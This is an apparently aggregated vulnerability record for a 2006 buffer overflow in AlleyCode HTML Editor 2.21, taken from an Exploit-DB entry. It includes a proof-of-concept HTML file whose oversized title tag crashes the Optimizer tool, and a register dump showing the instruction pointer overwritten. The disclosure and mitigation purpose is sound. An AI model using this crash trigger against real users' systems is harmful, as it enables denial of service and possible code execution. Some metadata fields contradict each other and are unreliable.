AlleyCode HTML Editor Vulnerability

vendor:

AlleyCode HTML Editor

by:

PCWorld Magazine

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: AlleyCode HTML Editor

Affected Version From: 2.21

Affected Version To: 2.21

Patch Exists: YES

Related CWE: N/A

CPE: a:alleycode:alleycode_html_editor

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

AlleyCode HTML Editor Vulnerability

AlleyCode HTML Editor is vulnerable to a buffer overflow vulnerability when a specially crafted HTML file is opened and the Optimizer tool is used. This can lead to arbitrary code execution. The vulnerability is caused by the lack of proper validation of user-supplied input when processing the HTML file.

Mitigation:

Upgrade to the latest version of AlleyCode HTML Editor.

Source

Exploit-DB raw data:

What is AlleyCode?

AlleyCode is a free html editor. Alleycode was chosen as one of the best freebies on the Net. The entire list of the ' 101 Fabulous Freebies' was featured in the May 2006 issue of PCWorld Magazine. Thanks PCWorld...

Alleycode is a fast, sleek and highly productive award winning HTML editor with unique features. If you are new to HTML, Alleycode's great tutorial will walk you through your first coding steps... If you are an established coder you will find a refreshing, non-bloated infrastructure with fast and accurate delivery. Beyond HTML, Alleycode's wizardry focuses on PHP and CSS interaction for professional and easy management of your projects. Best of all, Alleycode is FREE! (we do accept donations if you find it useful).

What is the last version released?

The last version is 2.21

Where can i download AlleyCode?

You can download at http://www.alleycode.com/download.htm

POC:

Just create a html file with this code:

<html>

<head>

<title>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@AAAA@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@</title>

<body>

oi

</body>

</html>

Then Click at Tools and Optimizer.

Registers:

EAX 00000000

ECX 41414141

EDX 7C9032BC ntdll.7C9032BC

EBX 00000000

ESP 0012F174

EBP 0012F194

ESI 00000000

EDI 00000000

EIP 41414141

C 0 ES 0023 32bit 0(FFFFFFFF)

P 1 CS 001B 32bit 0(FFFFFFFF)

A 0 SS 0023 32bit 0(FFFFFFFF)

Z 1 DS 0023 32bit 0(FFFFFFFF)

S 0 FS 003B 32bit 7FFDD000(FFF)

T 0 GS 0000 NULL

D 0

O 0 LastErr ERROR_SUCCESS (00000000)

EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)

ST0 empty -UNORM 9FF2 0000000C 0012FBC4

ST1 empty -3.8474706309670431820e-4535

ST2 empty 3.9878918856663954540e-2331

ST3 empty +UNORM 00C3 00000000 00000084

ST4 empty 0.0000000546879907910e-4933

ST5 empty 1.0000000000000000000

ST6 empty 1.0000000000000000000

ST7 empty 1.0000000000000000000

3 2 1 0 E S P U O Z D I

FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)

FCW 1372 Prec NEAR,64 Mask 1 1 0 0 1 0

Rafael Sousa